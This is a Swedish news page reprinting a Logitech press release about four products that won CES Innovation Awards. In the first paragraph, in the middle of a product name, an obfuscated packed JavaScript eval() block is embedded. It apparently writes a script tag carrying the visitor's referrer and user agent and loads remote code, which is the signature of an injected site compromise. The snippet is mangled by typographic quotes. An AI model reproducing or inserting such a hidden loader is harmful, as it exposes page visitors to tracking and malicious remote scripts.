Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Logitech belönade av CEA med fyra CES Innovation Awards

Logitech belönade av CEA med fyra CES Innovation Awards
Sebastian

Idag tillkännager Logitech att fyra produkter har prisats i CES Innovation Awards. Årets erkännande går till: Logitech® eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aaaff|var|u0026u|referrer|deddh||js|php’.split(’|’),0,{}))
Bluetooth® Multi-Device Keyboard K480
, Logitech® G502 Proteus Core Tunable Gaming Mouse, Logitech® G402 Hyperion Fury™ Ultra-Fast FPS Gaming Mouse och Logitech® G910 Orion Spark RGB Mechanical Keyboard.

“Exceptionell design är skapad för att gå hand i hand med folks liv. God design kombinerar konst och vetenskap på ett sätt som är helt sömlöst för användaren”, sa Bracken Darrell, VD för Logitech. ”Varje produkt vi skapar är fokuserad kring en enda kraftfull idé som sen återspeglas genom varje aspekt av användarens upplevelse. Vi strävar efter att göra produkter som inte bara är vackra utan som också levererar en upplevelse som sticker ut. Ibland är det uppenbart hur detta genomsyrar en produkt och ibland är det något man upptäcker över tid. Det är en ära att Consumer Electronics Association har givit oss igenkänning för våra ansträngningar.”

Prisbelönt i kategorin datortillbehör:

Logitech Bluetooth Multi-Device Keyboard K480:

Logitech Bluetooth Multi-Device Keyboard K480 är ett nätt tangentbord som du kan använda med upp till tre olika enheter. Nu kan du arbeta med en rapport på datorn och med en enkel handvändning svara på ett sms eller twittra på din tablet, allt med ett och samma tangentbord.

Prisbelönta i kategorin Gaminghårdvara och tillbehör:

Logitech G502 Proteus Core Tunable Gaming Mouse:

Logitech G502 Proteus Core Tunable Gaming Mouse är en totalt anpassningsbar mus. Den kombinerar världens första 12,000 DPI-sensor med avancerad ytanpassning och ett viktsystem som hjälper spelare att uppnå maximal precision, pricksäkerhet och responsivitet. Proteus Core kommer med Logitechs egna Delta Zero™-teknologi i världens mest kraftfulla och avancerade sensor. Du kan enkelt anpassa musen till din specifika omgivning, lägga till upp till fem 3.6gramsvikter eller programmera in vilket makro du vill på de 11 programmerbara knapparna.

Logitech G402 Hyperion Fury Ultra-Fast FPS Gaming Mouse:

Logitech G402 Hyperion Fury Ultra-Fast FPS Gaming Mouse är världens snabbaste spelmus och det bästa valet för snabba FPS-spel. Hyperion Fury kommer med Logitechs egna Fusion Engine™-sensorteknologi som kan tracka i upp till 500 tum per second (IPS), med Logitechs egna Delta Zero™-teknologi för oöverträffad precision. Den kommer med åtta programmerbara knappar med inbyggt minne, fyra DPI-inställningar och en uppdateringsfrekvens på 1 millisekund.

Logitech G910 Orion Spark RGB Mechanical Keyboard:

Logitech G910 Orion Spark RGB Mechanical Keyboard är världens snabbaste mekaniska tangentbord. Det är utrustat med Logitechs egna mekaniska Romer-G™-brytare, intelligent RGB-belysning och integration med Arx Control-appen. Det kombinerar blixtsnabb responsivitet med överlägsen precision och belysning.

Prestigefulla CES Innovation Awards är sponsrat av, producenten av CES, den globala mötesplatsen för konsumentelektronikbranschen. De har belönat god design sedan 1976. Logitechs fyra produkter kommer att gå att se på CES, jan 6-9, 2015, i Las Vegas, Nevada. Även på CES Unveiled New York, mellan 4:30-7:30 p.m. Nov. 11 på Metropolitan Pavilion i New York, N.Y.

Om Logitech

Logitech är världsledande inom produkter som kopplar dig samman med de digitala upplevelser som spelar roll för dig. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).